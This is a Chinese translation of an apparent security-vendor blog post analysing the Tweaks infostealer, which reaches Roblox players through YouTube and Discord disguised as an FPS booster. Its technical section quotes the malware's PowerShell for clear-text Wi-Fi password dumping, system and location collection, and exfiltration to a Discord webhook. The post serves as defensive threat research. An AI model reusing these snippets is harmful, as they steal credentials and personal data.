介绍
Zscaler 的 ThreatLabz 最近发现了一项新活动,该活动针对 Roblox 用户分发名为 Tweaks(又名 Tweaker)的信息窃取程序。攻击者正在利用 YouTube 和 Discord 等流行平台向 Roblox 用户分发 Tweaks,利用合法平台的能力来逃避通常会阻止已知恶意服务器的 Web 过滤器阻止列表的检测。攻击者与用户共享伪装成每秒帧数 (FPS) 优化包的恶意文件,反过来,用户用 Tweaks 恶意软件感染自己的系统。
鉴于 45% 的Roblox 用户年龄在 13 岁以下,正在传播的恶意软件很可能会扩展到父母的系统。此外,随着远程工作的普及,这种恶意软件有可能渗入员工子女(秘密地)使用的公司设备。成功感染不仅会使 Roblox 帐户数据容易受到攻击,而且还可能危及数据和设备。
在本博客中,我们分析了 Tweaks 攻击活动及其技术特征。
要点
Tweaks 或 Tweaker 窃取程序伪装成一种为 Roblox 用户增强每秒帧数 (FPS) 的工具,在用户不知情的情况下在后台窃取数据。
攻击者利用 YouTube 诱使用户观看“如何提高 FPS”视频,其中包含指向其 Discord 群组的链接。一旦用户加入这些组,攻击者就会向他们提供伪装成游戏调整和修改的恶意文件的链接。
该窃取程序基于 Powershell,会窃取用户信息、位置、Wi-Fi 配置文件、密码、Roblox ID 和游戏内货币详细信息等敏感数据。
一旦获得敏感数据,就会通过 Discord Webhook 将其发送到攻击者控制的服务器。 ThreatLabz 研究人员发现多名攻击者复制 Tweaks 的“免费”版本,并用它来销售“付费”版本。
背景
为什么 FPS 对 Roblox 用户有吸引力?
Roblox 游戏拥有庞大的用户群,包括全球数百万玩家。Roblox 提供多样化的游戏和体验,让玩家能够探索虚拟世界并参与各种活动。吸引 Roblox 玩家的一项功能是渴望增强的游戏体验,包括改进的 FPS。更高的 FPS 可以带来更流畅的游戏体验,这对于寻求最佳性能的玩家来说是一个有吸引力的前景。游戏玩家从 YouTube 和 Discord 等流行平台下载优化工具来提高硬件性能的情况并不罕见,这使得游戏玩家更有可能无意中下载 Tweaks 恶意软件。
游戏行业遭遇更多网络攻击
Roblox 拥有7150 万每日活跃用户的庞大用户群,使其成为网络攻击者的有吸引力的目标。此外,2024 年的报告显示,游戏产业目前价值约为 4552.7 亿美元。鉴于这些趋势,寻求利用敏感数据并从中获利的黑客将 Roblox 用户作为目标也就不足为奇了,这些用户与许多其他游戏玩家一样,在其游戏帐户中存储了大量数据
活动分析
在我们的调查过程中,我们发现了几个 YouTube 频道和视频,提供有关如何提高 Roblox 中的 FPS 的教程。在这些视频中,Roblox 玩家被指示禁用防病毒软件,以确保“PC 优化器”顺利运行而不会遇到任何问题。实际上,这种策略是为了让用户的系统更容易感染恶意软件。
在这些视频的描述框中,提供了攻击者对应的 Discord 群组的链接。下面的图 1 显示了 Tweaks YouTube 频道、提供给用户的 Discord 群组链接以及用户下载初始文件时出现的初始 Tweaks 界面。
图 1:Tweaks YouTube 频道、Discord 群组链接和 Tweaks 界面的示例
一旦进入攻击者控制的 Discord 频道,用户就会遇到免费和付费版本的 FPS 优化文件。我们的初步分析表明,两个版本是相同的,使用相同的 BAT 文件。因此,免费版本和付费版本之间的选择对结果没有影响。唯一的区别是,选择付费版本的用户遭受了少量的经济损失,并且数据被盗。
目前,攻击者通过提供优化功能有限的免费版本以及承诺更高级优化功能的付费版本来吸引新用户。
一旦用户下载了文件,他们就会在不知不觉中安装 Tweaks 恶意软件,这不仅会感染他们的系统,还会使他们的数据面临被盗的风险。从用户的角度来看,一切看起来都很正常,因为 Tweaks 恶意软件真正增强了 FPS 优化。这种欺骗行为降低了用户对恶意软件的怀疑,因为它似乎正在实现其预期目的。下面的图 2 显示了 Discord 频道上 Tweaks 的付费版本和免费版本。
图 2:Discord 组织广告 FPS 优化文件以分发 Tweaks 恶意软件的示例
案例研究1
加入 Discord 群组后,Roblox 游戏玩家会被引导从 Mediafire 链接下载恶意 BAT 文件,从而导致恶意软件感染。
一旦恶意软件被执行,BAT 文件就会向用户呈现 Tweaks 菜单界面,同时在后台窃取他们的信息。然后,被盗数据通过 Discord Webhooks 发送到攻击者控制的服务器。
下图说明了 Tweaks 攻击链。
图 3:说明了涉及提供 BAT 文件的 Discord 组织的 Tweaks 攻击链
案例研究2
经过进一步调查,我们发现 Tweaks 正在 Discord 上出售。有两个版本可供购买:测试版菜单和付费菜单。
恶意软件作者将 BAT 文件转换为 EXE 文件,然后将该 EXE 文件插入受密码保护的 ZIP 存档中。此新迭代采用与案例研究 1 中讨论的 BAT 文件相同的窃取功能。下图说明了案例研究 2 的 Tweaks 攻击链。
图 4:此图说明了 Tweaks 攻击链,其中涉及在 ZIP 存档内提供 EXE 文件的 Discord 组织
功能
Tweaks 恶意软件可以窃取以下数据:
用户的 Wi-Fi 配置文件和密码
UUID 和用户名
用户位置
IP地址和时间
系统信息
Roblox ID 和游戏内货币信息
技术分析
以下分析涵盖了案例研究 1 和案例研究 2 的调整技术特征。
案例研究1
1. BAT 文件建立 Webhook:首先,一旦用户下载 BAT 文件并执行它,恶意软件就会使用以下 Powershell 命令建立必要的 Webhook URL:
"$payload = [PSCustomObject]@{ embeds = @($embedObject) };" ^
"Invoke-RestMethod -Uri $webHookUrl -Body ($payload | ConvertTo-Json -Depth 4) -Method Post -ContentType 'application/json';"该文件将窃取的数据嵌入到 Webhook 中,确保其传输给攻击者。
2. Wi-Fi 配置文件和密码盗窃:恶意软件使用以下 Powershell 命令窃取 Wi-Fi 配置文件和密码:
“$wifiProfiles = (netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object { $_.ToString().Split(':')[1].Trim() } | ForEach-Object { $ssid = $_; $pwd = (netsh wlan show profile name=$ssid key=clear) | Select-String 'Key Content' | ForEach-Object { $_.ToString().Split(':')[1].Trim() }; if ($pwd) { Write-Output ('SSID: ' + $ssid + ', Password: ' + $pwd) } else { Write-Output 'SSID: ' + $ssid + ', Password: NO PASSWORDS FOUND' } });”上面的代码示例也如下图 5 所示。
图 5:调整显示 webhook 设置和 Wi-Fi 配置文件/密码盗窃的代码
3. 使用 WMI 收集系统信息:恶意软件利用 Windows Management Instrumentation (WMI) 收集 UUID 和用户名以及用户位置,包括以下字段:国家、地区、城市和大致位置。Powershell 代码如下所示:
"$hwid = (Get-WmiObject win32_computersystemproduct | Select-Object -ExpandProperty UUID);" ^
"$pcUsername = $env:USERNAME;"
"$ipInfo = Invoke-RestMethod -Uri 'http://ipinfo.io/json';" ^
"$country = $ipInfo.country;" ^
"$region = $ipInfo.region;" ^
"$city = $ipInfo.city;" ^
"$location = $ipInfo.loc;"上面的代码示例以及用户的位置和用户名如下图 6 所示。
图 6:调整代码显示 UUID、用户名和用户位置被盗
4. 其他数据盗窃:此外,该恶意软件还会收集 IP 信息,例如私有和公共 IP 地址、当前时间、系统信息、Roblox ID 和货币信息。
前面的值是使用以下 Powershell 代码收集的:
"$publicIp = (Invoke-RestMethod -Uri 'https://api64.ipify.org?format=json').ip;" ^
"$privateIp = (Test-Connection -ComputerName $env:COMPUTERNAME -Count 1).IPV4Address.IPAddressToString;" ^
"$currentTime = Get-Date -Format 'yyyy-MM-dd HH:mm:ss';" ^
"$description = 'Public IP: ' + $publicIp + ' - Private IP: ' + $privateIp + ' - Current Time: ' + $currentTime;"后面的值是通过下面图 7 中所示的代码收集的。
图 7:调整代码,显示系统信息、Roblox ID 和游戏内货币详细信息的收集
案例研究2
在案例研究 2 中,当用户点击 Discord 组中提到的链接时,会下载一个 ZIP 存档,其中包含一个 EXE 文件。一旦用户执行 EXE 文件,它就会显示类似于案例研究 1 的 Tweaks 菜单界面。
恶意软件在 Temp 目录中创建一个C:Users\AppDataLocalTempF9B9.tmp随机名称的文件夹,并在该目录中创建一个 BAT 文件,如下面的屏幕截图所示。
图 8:Tweaks EXE 文件的进程树
删除的 BAT 文件的源代码与案例研究 1 中使用的 BAT 文件类似,其功能也相同。
结论
攻击者正在利用 YouTube 和 Discord 等流行社区平台来传播 Tweaks 恶意软件并窃取敏感数据。他们利用 YouTube 和 Discord 社区的合法声誉来诱骗受害者无意中下载(并且在某些情况下付费)自己感染的恶意软件。为了减轻这些风险,Roblox 用户(以及所有游戏玩家)应优先使用来自信誉良好且安全来源的合法应用程序,从而避免未知或未经验证的应用程序来源。通过遵守这些预防措施,游戏玩家可以增强网络安全防御并保护自己免受潜在恶意软件威胁。
Zscaler 沙盒覆盖范围
在我们调查此活动期间,Zscaler 沙盒在分析各种文件的行为方面发挥了至关重要的作用。通过沙箱分析,确定了威胁评分和触发的特定 MITRE ATT&CK 技术。
图 9:沙箱报告
MITRE ATT&CK 技术
妥协指标 (IOC)
参考链接: https://www.zscaler.com/blogs/security-research/tweaks-stealer-targets-roblox-users-through-youtube-and-discord#introduction
图片来源网络目标可联系删除
